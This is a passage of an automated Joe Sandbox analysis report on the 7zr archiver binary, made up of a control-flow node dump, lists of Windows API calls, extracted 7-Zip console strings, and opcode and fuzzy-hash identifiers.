75441 ad1e40 free 75211->75441 75221 af19ff 75212->75221 75214 af1a4f 75444 ad1e40 free 75214->75444 75216 af1a57 75445 b02db9 free ctype 75216->75445 75218 ad1524 malloc _CxxThrowException 75218->75221 75219 af1a64 75446 b02db9 free ctype 75219->75446 75221->75214 75221->75218 75223 af1a83 75221->75223 75443 ad42e3 CharUpperW 75221->75443 75447 af1d73 5 API calls __EH_prolog 75223->75447 75225 af1a97 _CxxThrowException 75226 af1aa5 __EH_prolog 75225->75226 75448 ad1e40 free 75226->75448 75228 af1ac8 75449 af02e8 free ctype 75228->75449 75230 af1ad1 75450 af1eab free __EH_prolog ctype 75230->75450 75232 af1add 75451 ad1e40 free 75232->75451 75234 af1ae5 75452 ad1e40 free 75234->75452 75236 af1aed 75453 b02db9 free ctype 75236->75453 75238 af1afa 75238->75023 75239->75025 75241 b05805 __EH_prolog 75240->75241 75242 b05847 75241->75242 75243 ad26dd 2 API calls 75241->75243 75242->75028 75244 b05819 75243->75244 75633 b05678 75244->75633 75248 b0583f 75650 ad1e40 free 75248->75650 75251 b0c748 __EH_prolog 75250->75251 75252 b0c7d7 ctype 6 API calls 75251->75252 75253 b0c75d 75252->75253 75667 ad1e40 free 75253->75667 75255 b0c768 75668 af2c0b 75255->75668 75259 b0c77d 75674 ad1e40 free 75259->75674 75261 b0c785 75675 ad1e40 free 75261->75675 75263 b0c78d 75676 ad1e40 free 75263->75676 75265 b0c795 75266 af2c0b ctype free 75265->75266 75267 b0a51d 75266->75267 75267->75034 75267->75149 75269 b0ad29 2 API calls 75268->75269 75270 b0a5d8 75269->75270 75271 b0bf3e 75270->75271 75272 ad2fec 3 API calls 75271->75272 75273 b0bf85 75272->75273 75274 ad2fec 3 API calls 75273->75274 75275 b0a5ee 75274->75275 75275->75059 75376->75040 75405->75033 75406->75038 75407->75037 75408->75045 75409->75047 75410->75054 75411->75058 75414->75174 75416 af0224 __EH_prolog 75415->75416 75454 ae3d66 75416->75454 75419 af062e 75425 af0638 __EH_prolog 75419->75425 75420 af06de 75541 af019a malloc _CxxThrowException free memcpy 75420->75541 75422 af06e6 75542 af1453 26 API calls 2 library calls 
75422->75542 75424 af06ee 75424->75183 75424->75198 75425->75420 75425->75424 75426 af01bc malloc _CxxThrowException free _CxxThrowException memcpy 75425->75426 75470 af0703 75425->75470 75540 b02db9 free ctype 75425->75540 75426->75425 75429->75186 75430->75191 75431->75198 75432->75198 75433->75198 75434->75190 75435->75194 75437 ad9245 75436->75437 75581 ad90da 75437->75581 75440->75211 75441->75211 75442->75200 75443->75221 75444->75216 75445->75219 75446->75191 75447->75225 75448->75228 75449->75230 75450->75232 75451->75234 75452->75236 75453->75238 75465 b6fb10 75454->75465 75456 ae3d70 GetCurrentProcess 75466 ae3e04 75456->75466 75458 ae3d8d OpenProcessToken 75459 ae3d9e LookupPrivilegeValueW 75458->75459 75460 ae3de3 75458->75460 75459->75460 75461 ae3dc0 AdjustTokenPrivileges 75459->75461 75462 ae3e04 CloseHandle 75460->75462 75461->75460 75463 ae3dd5 GetLastError 75461->75463 75464 ae3def 75462->75464 75463->75460 75464->75419 75465->75456 75467 ae3e0d 75466->75467 75468 ae3e11 CloseHandle 75466->75468 75467->75458 75469 ae3e21 75468->75469 75469->75458 75471 af070d __EH_prolog 75470->75471 75477 af0c83 75471->75477 75482 ad2da9 2 API calls 75471->75482 75483 af0ab5 75471->75483 75485 af0b40 75471->75485 75492 ad2e04 2 API calls 75471->75492 75500 ad2fec 3 API calls 75471->75500 75512 af0b26 75471->75512 75515 b104d2 malloc _CxxThrowException free _CxxThrowException memcpy 75471->75515 75528 b02db9 free ctype 75471->75528 75535 af0b48 75471->75535 75537 ad1524 malloc _CxxThrowException 75471->75537 75539 ad1e40 free ctype 75471->75539 75543 ad2f4a malloc _CxxThrowException free ctype 75471->75543 75544 ad1089 malloc _CxxThrowException free _CxxThrowException 75471->75544 75545 af13eb 5 API calls 2 library calls 75471->75545 75546 af050b 75471->75546 75551 af0021 GetLastError 75471->75551 75552 ad49bd 9 API calls 2 library calls 75471->75552 75553 af0306 12 API calls 75471->75553 75554 aeff00 5 API calls 2 library calls 75471->75554 75555 af057d 16 API 
calls 2 library calls 75471->75555 75556 af0f8e 24 API calls 2 library calls 75471->75556 75557 ad472e CharUpperW 75471->75557 75558 ae8984 malloc _CxxThrowException free _CxxThrowException memcpy 75471->75558 75559 af0ef4 68 API calls 2 library calls 75471->75559 75472 af0e1d 75578 af0416 18 API calls 2 library calls 75472->75578 75474 af0e47 75475 af0ea6 75474->75475 75579 af117d 68 API calls 2 library calls 75474->75579 75580 b1ec78 free ctype 75475->75580 75476 af0d11 75572 ad7496 7 API calls 2 library calls 75476->75572 75477->75472 75477->75476 75480 af0c13 75569 ad1e40 free 75480->75569 75482->75471 75483->75480 75487 ad2da9 2 API calls 75483->75487 75493 ad2e04 2 API calls 75483->75493 75505 ad2fec 3 API calls 75483->75505 75509 af050b 44 API calls 75483->75509 75518 af0c79 75483->75518 75526 ad1e40 free ctype 75483->75526 75560 ad2f4a malloc _CxxThrowException free ctype 75483->75560 75565 ad1089 malloc _CxxThrowException free _CxxThrowException 75483->75565 75566 af13eb 5 API calls 2 library calls 75483->75566 75567 af0ef4 68 API calls 2 library calls 75483->75567 75568 b02db9 free ctype 75483->75568 75570 af0021 GetLastError 75483->75570 75485->75425 75486 af0de0 75574 b02db9 free ctype 75486->75574 75487->75483 75488 ad2f1c 2 API calls 75521 af0d29 75488->75521 75491 af0df8 75576 ad1e40 free 75491->75576 75492->75471 75493->75483 75496 af0e02 75577 b02db9 free ctype 75496->75577 75499 ad2e04 2 API calls 75499->75521 75500->75471 75503 ad2fec 3 API calls 75503->75521 75505->75483 75509->75483 75511 af0df3 75575 ad1e40 free 75511->75575 75561 ad1e40 free 75512->75561 75515->75471 75517 ad1e40 free ctype 75517->75521 75571 ad1e40 free 75518->75571 75519 af0b30 75562 ad1e40 free 75519->75562 75521->75486 75521->75488 75521->75491 75521->75499 75521->75503 75521->75511 75521->75517 75573 af117d 68 API calls 2 library calls 75521->75573 75524 af0b38 75563 ad1e40 free 75524->75563 75526->75483 75528->75471 75564 b02db9 free ctype 75535->75564 75537->75471 
75539->75471 75540->75425 75541->75422 75542->75424 75543->75471 75544->75471 75545->75471 75547 ad6c72 44 API calls 75546->75547 75550 af051e 75547->75550 75548 af0575 75548->75471 75549 ad2f88 3 API calls 75549->75548 75550->75548 75550->75549 75551->75471 75552->75471 75553->75471 75554->75471 75555->75471 75556->75471 75557->75471 75558->75471 75559->75471 75560->75483 75561->75519 75562->75524 75563->75485 75564->75512 75565->75483 75566->75483 75567->75483 75568->75483 75569->75485 75570->75483 75571->75477 75572->75521 75573->75521 75574->75485 75575->75491 75576->75496 75577->75485 75578->75474 75579->75474 75580->75485 75582 ad90e4 __EH_prolog 75581->75582 75583 ad2f88 3 API calls 75582->75583 75585 ad90f7 75583->75585 75584 ad915d 75587 ad2e04 2 API calls 75584->75587 75585->75584 75586 ad9109 75585->75586 75591 ad9155 75586->75591 75594 ad2e47 2 API calls 75586->75594 75589 ad9165 75587->75589 75588 ad91be 75627 ad6332 6 API calls 2 library calls 75588->75627 75589->75588 75592 ad9174 75589->75592 75591->75211 75595 ad2f88 3 API calls 75592->75595 75593 ad917d 75596 ad91ca 75593->75596 75625 ad859e malloc _CxxThrowException free _CxxThrowException 75593->75625 75597 ad9122 75594->75597 75595->75593 75632 ad1e40 free 75596->75632 75622 ad8f57 memmove 75597->75622 75600 ad912e 75603 ad914d 75600->75603 75623 ad31e5 malloc _CxxThrowException free _CxxThrowException 75600->75623 75602 ad9185 75606 ad2e04 2 API calls 75602->75606 75624 ad1e40 free 75603->75624 75607 ad9197 75606->75607 75608 ad919f 75607->75608 75609 ad91ce 75607->75609 75611 ad91b9 75608->75611 75626 ad1089 malloc _CxxThrowException free _CxxThrowException 75608->75626 75610 ad2f88 3 API calls 75609->75610 75610->75611 75628 ad3199 malloc _CxxThrowException free _CxxThrowException 75611->75628 75614 ad91e6 75629 ad8f57 memmove 75614->75629 75616 ad91ee 75617 ad91f2 75616->75617 75619 ad2fec 3 API calls 75616->75619 75631 ad1e40 free 75617->75631 75620 ad9212 75619->75620 75630 ad31e5 malloc 
_CxxThrowException free _CxxThrowException 75620->75630 75622->75600 75623->75603 75624->75591 75625->75602 75626->75611 75627->75593 75628->75614 75629->75616 75630->75617 75631->75596 75632->75591 75634 b056b1 75633->75634 75635 b05689 75633->75635 75651 b05593 75634->75651 75637 b05593 6 API calls 75635->75637 75639 b056a5 75637->75639 75641 ad28a1 5 API calls 75639->75641 75641->75634 75643 b0570e fputs 75649 ad1fa0 fputc 75643->75649 75645 b056ef 75646 b05593 6 API calls 75645->75646 75647 b05701 75646->75647 75648 b05711 6 API calls 75647->75648 75648->75643 75649->75248 75650->75242 75652 b055ad 75651->75652 75653 ad28a1 5 API calls 75652->75653 75654 b055b8 75653->75654 75655 ad286d 5 API calls 75654->75655 75656 b055bf 75655->75656 75657 ad28a1 5 API calls 75656->75657 75658 b055c7 75657->75658 75659 b05711 75658->75659 75660 b05721 75659->75660 75661 b056e0 75659->75661 75662 ad28a1 5 API calls 75660->75662 75661->75643 75665 ad2881 malloc _CxxThrowException free memcpy _CxxThrowException 75661->75665 75663 b0572b 75662->75663 75666 b055cd 6 API calls 75663->75666 75665->75645 75666->75661 75667->75255 75677 ad1e40 free 75668->75677 75670 af2c16 75678 ad1e40 free 75670->75678 75672 af2c1e 75673 ad1e40 free 75672->75673 75673->75259 75674->75261 75675->75263 75676->75265 75677->75670 75678->75672 76498 b0acd3 76499 b0acf1 76498->76499 76500 b0ace0 76498->76500 76500->76499 76504 b0acf8 76500->76504 76505 b0c0b3 __EH_prolog 76504->76505 76506 b0c0ed 76505->76506 76509 af7193 free 76505->76509 76512 ad1e40 free 76505->76512 76513 ad1e40 free 76506->76513 76508 b0aceb 76511 ad1e40 free 76508->76511 76509->76505 76511->76499 76512->76505 76513->76508 76514 b569d0 76515 b569d4 76514->76515 76516 b569d7 malloc 76514->76516 76518 afd948 76548 afdac7 76518->76548 76520 afd94f 76521 ad2e04 2 API calls 76520->76521 76522 afd97b 76521->76522 76523 ad2e04 2 API calls 76522->76523 76524 afd987 76523->76524 76527 afd9e7 76524->76527 76556 ad6404 76524->76556 76529 
afda0f 76527->76529 76541 afda36 76527->76541 76581 ad1e40 free 76529->76581 76532 afd9bf 76579 ad1e40 free 76532->76579 76533 afda94 76585 ad1e40 free 76533->76585 76534 afda17 76582 ad1e40 free 76534->76582 76538 afd9c7 76580 ad1e40 free 76538->76580 76539 afda9c 76586 ad1e40 free 76539->76586 76540 ad2da9 2 API calls 76540->76541 76541->76533 76541->76540 76544 b104d2 5 API calls 76541->76544 76583 ad1524 malloc _CxxThrowException __EH_prolog ctype 76541->76583 76584 ad1e40 free 76541->76584 76544->76541 76545 afd9cf 76549 afdad1 __EH_prolog 76548->76549 76550 ad2e04 2 API calls 76549->76550 76551 afdb33 76550->76551 76552 ad2e04 2 API calls 76551->76552 76553 afdb3f 76552->76553 76554 ad2e04 2 API calls 76553->76554 76555 afdb55 76554->76555 76555->76520 76557 ad631f 9 API calls 76556->76557 76558 ad6414 76557->76558 76559 ad6423 76558->76559 76560 ad2f88 3 API calls 76558->76560 76561 ad2f88 3 API calls 76559->76561 76560->76559 76562 ad643d 76561->76562 76563 ae7e5a 76562->76563 76564 ae7e64 __EH_prolog 76563->76564 76587 ae8179 76564->76587 76567 af7ebb free 76568 ae7e7f 76567->76568 76569 ad2fec 3 API calls 76568->76569 76570 ae7e9a 76569->76570 76571 ad2da9 2 API calls 76570->76571 76572 ae7ea7 76571->76572 76573 ad6c72 44 API calls 76572->76573 76574 ae7eb7 76573->76574 76592 ad1e40 free 76574->76592 76576 ae7ecb 76577 ae7ed8 76576->76577 76593 ad757d GetLastError 76576->76593 76577->76527 76577->76532 76579->76538 76580->76545 76581->76534 76582->76545 76583->76541 76584->76541 76585->76539 76586->76545 76591 ae8906 76587->76591 76588 ae7e77 76588->76567 76591->76588 76594 ae8804 free ctype 76591->76594 76595 ad1e40 free 76591->76595 76592->76576 76593->76577 76594->76591 76595->76591 76596 adb144 76597 adb153 76596->76597 76599 adb159 76596->76599 76598 ae11b4 107 API calls 76597->76598 76598->76599 76600 afa7c5 76618 afa7e9 76600->76618 76651 afa96b 76600->76651 76601 afade3 76705 ad1e40 free 76601->76705 76603 afa952 76603->76651 76686 afe0b0 6 API 
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00B181F1
                                                            • Part of subcall function 00B1F749: _CxxThrowException.MSVCRT(?,00B84A58), ref: 00B1F792
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: ExceptionH_prologThrow
                                                          • String ID:
                                                          • API String ID: 461045715-3916222277
                                                          • Opcode ID: 50e8f70c63717ac248296761d693248946bf0ebf9c84183eeaa1afe51dc7629a
                                                          • Instruction ID: 0c2f426f44cd38e3c7f12337b1402e5f79cac624e284ae85817b6e6d77efea78
                                                          • Opcode Fuzzy Hash: 50e8f70c63717ac248296761d693248946bf0ebf9c84183eeaa1afe51dc7629a
                                                          • Instruction Fuzzy Hash: E4928C30900249DFDB15DFA8C884BEEBBF1FF19304F644499E815AB291CB759E85CBA1
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00AD686D
                                                            • Part of subcall function 00AD6848: FindClose.KERNELBASE(00000000,?,00AD6880), ref: 00AD6853
                                                          • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 00AD68A5
                                                          • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 00AD68DE
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: Find$FileFirst$CloseH_prolog
                                                          • String ID:
                                                          • API String ID: 3371352514-0
                                                          • Opcode ID: da71ed2a7e8a25ec48e177c261ae26f3a78950b09f2db5ebcf7d33e3dd1f281c
                                                          • Instruction ID: 469f9385c07fe12f747e88d0b9c33fdfe168d0325ebcd94359cf6ca6568964c8
                                                          • Opcode Fuzzy Hash: da71ed2a7e8a25ec48e177c261ae26f3a78950b09f2db5ebcf7d33e3dd1f281c
                                                          • Instruction Fuzzy Hash: 9811B231500209DBCF10EFA4D9515FDBBB9EF50324F10466AE96257392DB368E85EB40

                                                          Control-flow Graph
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: fputs$ExceptionThrow
                                                          • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $N
                                                          • API String ID: 3665150552-429544124
                                                          • Opcode ID: 08ee061b74dca183d99285391488da40d0f788e76eb3fb5efa16620349af2b86
                                                          • Instruction ID: e8395e08c676968ef313ccdabc012c2065fcbbc4d795ad90ba7e836ed4f6929d
                                                          • Opcode Fuzzy Hash: 08ee061b74dca183d99285391488da40d0f788e76eb3fb5efa16620349af2b86
                                                          • Instruction Fuzzy Hash: F2527831A042589FDF26EBA4C995BEDBBF5EF54300F1444DAE44A672A1DB306E88CF11

                                                          Control-flow Graph
                                                          APIs
                                                          • fputs.MSVCRT(Scanning the drive for archives:), ref: 00B0A43E
                                                            • Part of subcall function 00AD1FA0: fputc.MSVCRT ref: 00AD1FA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: fputcfputs
                                                          • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $!"$N
                                                          • API String ID: 269475090-3104439828

                                                          Control-flow Graph
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00B08017
                                                          • fputs.MSVCRT ref: 00B0804D
                                                            • Part of subcall function 00B08341: __EH_prolog.LIBCMT ref: 00B08346
                                                            • Part of subcall function 00B08341: fputs.MSVCRT ref: 00B0835B
                                                            • Part of subcall function 00B08341: fputs.MSVCRT ref: 00B08364
                                                          • fputs.MSVCRT ref: 00B0807A
                                                            • Part of subcall function 00AD1FA0: fputc.MSVCRT ref: 00AD1FA7
                                                            • Part of subcall function 00AD965D: VariantClear.OLEAUT32(?), ref: 00AD967F
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00B081AA
                                                          • fputs.MSVCRT ref: 00B081CD
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00B08267
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00B082B1
                                                          Strings
                                                          Similarity
                                                          • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                                                          • String ID: --$----$Path$Type$Warning: The archive is open with offset
                                                          • API String ID: 2889736305-3797937567

                                                          Control-flow Graph
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00B0676B
                                                          • EnterCriticalSection.KERNEL32(00B92938), ref: 00B06781
                                                          • fputs.MSVCRT ref: 00B0680B
                                                          • LeaveCriticalSection.KERNEL32(00B92938), ref: 00B06944
                                                            • Part of subcall function 00B0C7D7: fputs.MSVCRT ref: 00B0C840
                                                          • fputs.MSVCRT ref: 00B06851
                                                            • Part of subcall function 00AD2201: fputs.MSVCRT ref: 00AD221E
                                                          • fputs.MSVCRT ref: 00B068D9
                                                          • fputs.MSVCRT ref: 00B068F6
                                                            • Part of subcall function 00AD1FA0: fputc.MSVCRT ref: 00AD1FA7
                                                          Strings
                                                          Similarity
                                                          • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                                                          • String ID: v$Sub items Errors:
                                                          • API String ID: 2670240366-2468115448

                                                          Control-flow Graph
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00B0635E
                                                          • fputs.MSVCRT ref: 00B0645F
                                                            • Part of subcall function 00B0C7D7: fputs.MSVCRT ref: 00B0C840
                                                          • fputs.MSVCRT ref: 00B06547
                                                          • fputs.MSVCRT ref: 00B0665F
                                                          • fputs.MSVCRT ref: 00B066AE
                                                            • Part of subcall function 00AD1F91: fflush.MSVCRT ref: 00AD1F93
                                                            • Part of subcall function 00AD1FB3: __EH_prolog.LIBCMT ref: 00AD1FB8
                                                            • Part of subcall function 00AD1E40: free.MSVCRT ref: 00AD1E44
                                                          Strings
                                                          Similarity
                                                          • API ID: fputs$H_prolog$fflushfree
                                                          • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                                                          • API String ID: 1750297421-1898165966

                                                          Control-flow Graph
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00AD6C77
                                                          • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 00AD6EC9
                                                            • Part of subcall function 00AD6C72: wcscmp.MSVCRT ref: 00AD70A5
                                                            • Part of subcall function 00AD6BF5: __EH_prolog.LIBCMT ref: 00AD6BFA
                                                            • Part of subcall function 00AD6BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 00AD6C1A
                                                            • Part of subcall function 00AD6BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 00AD6C49
                                                          Strings
                                                          Similarity
                                                          • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                                                          • String ID: :$DATA
                                                          • API String ID: 3316598575-2587938151
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: fputs$H_prolog
                                                          • String ID: =
                                                          • API String ID: 2614055831-2525689732
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00B08346
                                                          • fputs.MSVCRT ref: 00B0835B
                                                          • fputs.MSVCRT ref: 00B08364
                                                            • Part of subcall function 00B083BF: __EH_prolog.LIBCMT ref: 00B083C4
                                                            • Part of subcall function 00B083BF: fputs.MSVCRT ref: 00B08401
                                                            • Part of subcall function 00B083BF: fputs.MSVCRT ref: 00B08437
                                                          Strings
                                                          Similarity
                                                          • API ID: fputs$H_prolog
                                                          • String ID: =
                                                          • API String ID: 2614055831-2525689732
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00AF209B
                                                            • Part of subcall function 00AD757D: GetLastError.KERNEL32(00ADD14C), ref: 00AD757D
                                                            • Part of subcall function 00AF2C6C: __EH_prolog.LIBCMT ref: 00AF2C71
                                                            • Part of subcall function 00AD1E40: free.MSVCRT ref: 00AD1E44
                                                          Strings
                                                          Similarity
                                                          • API ID: H_prolog$ErrorLastfree
                                                          • String ID: Cannot find archive file$The item is a directory
                                                          • API String ID: 683690243-1569138187
                                                          • Opcode ID: 7781031eca58ea0bb706f0ac69d5ee78c5baef7b1e445e594c5f76f7a643e2ed
                                                          • Instruction ID: f5c5163fc6181d98a51830fcc086297d06f202f18250ccf18d6e5255e375fa33
                                                          • Opcode Fuzzy Hash: 7781031eca58ea0bb706f0ac69d5ee78c5baef7b1e445e594c5f76f7a643e2ed
                                                          • Instruction Fuzzy Hash: 4F723670D00258DFCB25DFA8C984BEDBBB5AF59300F14409AE959AB352CB709E81CF91
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                           • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: CountTickfputs
                                                          • String ID: .
                                                          • API String ID: 290905099-4150638102
                                                          • Opcode ID: 0dbd41eea64bbd9a857c363635c2332dccedf2cfe3246f1825e1e056f03ec16d
                                                          • Instruction ID: 53afb176cc76b6c8b0b3e9d98d52385fb39e6fd37da56f181e2f7fbf4ba324cd
                                                          • Opcode Fuzzy Hash: 0dbd41eea64bbd9a857c363635c2332dccedf2cfe3246f1825e1e056f03ec16d
                                                          • Instruction Fuzzy Hash: 68713830600B049FCB25EF68C591BAEBBF6EF91300F504A9EE49797A91DB70B945CB11
                                                          APIs
                                                            • Part of subcall function 00AD9C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00AD9CB3
                                                            • Part of subcall function 00AD9C8F: GetProcAddress.KERNEL32(00000000), ref: 00AD9CBA
                                                            • Part of subcall function 00AD9C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00AD9CC8
                                                          • __aulldiv.LIBCMT ref: 00B1093F
                                                          • __aulldiv.LIBCMT ref: 00B1094B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                           • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                                                          • String ID: 3333
                                                          • API String ID: 3520896023-2924271548
                                                          • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                                          • Instruction ID: b0367ce36516344b88f39d0e1130235a4f7277c5d307743b45ec8ce8b9638c08
                                                          • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                                          • Instruction Fuzzy Hash: C521BAB0900704AFE730EF699881A6BBAF9EB84750F40896EB186D7241D670A9808B55
                                                          APIs
                                                            • Part of subcall function 00AD1E40: free.MSVCRT ref: 00AD1E44
                                                          • memset.MSVCRT ref: 00AFAEBA
                                                          • memset.MSVCRT ref: 00AFAECD
                                                            • Part of subcall function 00B104D2: _CxxThrowException.MSVCRT(?,00B84A58), ref: 00B104F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                           • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: memset$ExceptionThrowfree
                                                          • String ID: Split
                                                          • API String ID: 1404239998-1882502421
                                                          • Opcode ID: a5d0ed6f3831de185969f1c10454b64e279d596181c702c7b6cd6644e6fcf085
                                                          • Instruction ID: 3e505a36a53767198e85405ad68ce9e14830f40b38be9c48883faf5d53c16a46
                                                          • Opcode Fuzzy Hash: a5d0ed6f3831de185969f1c10454b64e279d596181c702c7b6cd6644e6fcf085
                                                          • Instruction Fuzzy Hash: 144249B0A0024DDFDF25DBE4C984BFDBBB1AF25304F1440A9E649A7251CB71AE85CB52
                                                          APIs
                                                          • fputs.MSVCRT ref: 00B08437
                                                          • fputs.MSVCRT ref: 00B08401
                                                            • Part of subcall function 00AD1FB3: __EH_prolog.LIBCMT ref: 00AD1FB8
                                                          • __EH_prolog.LIBCMT ref: 00B083C4
                                                            • Part of subcall function 00AD1FA0: fputc.MSVCRT ref: 00AD1FA7
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                           • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
